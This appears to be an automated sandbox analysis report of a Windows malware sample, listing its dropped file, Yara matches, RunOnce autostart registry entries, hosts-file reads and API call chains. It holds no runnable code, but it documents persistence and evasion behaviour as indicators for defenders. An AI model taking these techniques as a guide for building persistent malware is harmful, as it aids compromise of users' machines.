Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: mPNVrHIpyt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: mPNVrHIpyt.exe, type: SAMPLE
Source: Yara match	File source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.523518226.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.302743243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.561698093.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.606192732.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.401188568.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.485070318.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.363985954.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.385026266.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.471324197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.264971762.000000000F69A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.357323149.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.405226267.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.565428063.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.467592821.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.597821532.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.547433699.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.449352573.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.383675616.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.422070871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.567428078.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.470832696.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.601264865.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.505234483.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.444710871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.321133700.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.547067316.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.407240939.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.511336369.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.580667243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.508822992.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.343145557.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mPNVrHIpyt.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 2996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 2156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 4920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, type: DROPPED

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F698400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F698400

Source: wzltxa.exe.0.dr	Static PE information: real checksum: 0x120f7 should be: 0x1f358
Source: mPNVrHIpyt.exe	Static PE information: real checksum: 0x120f7 should be: 0x21748

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zrmtrmmkdhu
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo	Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip	Jump to behavior
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce imsihyxywip	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lwxsmttcgib	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rbpjrvqzmfp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce lldeowbcwli	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mvsrloqetvq	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce pkxyauwkvet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce axlnhkgixlf	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xjlfhrnjhfo	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ovikprhtlzq
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce jmfyvzwgtay
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zrmtrmmkdhu
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zrmtrmmkdhu
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zrmtrmmkdhu
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zrmtrmmkdhu

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	0_2_0F692F50
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	11_2_0FBB2F50
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	12_2_0FBB2F50

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F696DF0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F696BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_0FBB6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_0FBB6DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	12_2_0FBB6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	12_2_0FBB6DF0

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	API call chain: ExitProcess graph end node	graph_0-1982
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	API call chain: ExitProcess graph end node	graph_0-1774
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	API call chain: ExitProcess graph end node	graph_0-1911
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	API call chain: ExitProcess graph end node	graph_0-1783
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_11-1961
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_11-1742
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_11-1765
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_11-1756
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_11-1893
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_12-1961
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	API call chain: ExitProcess graph end node	graph_12-1742
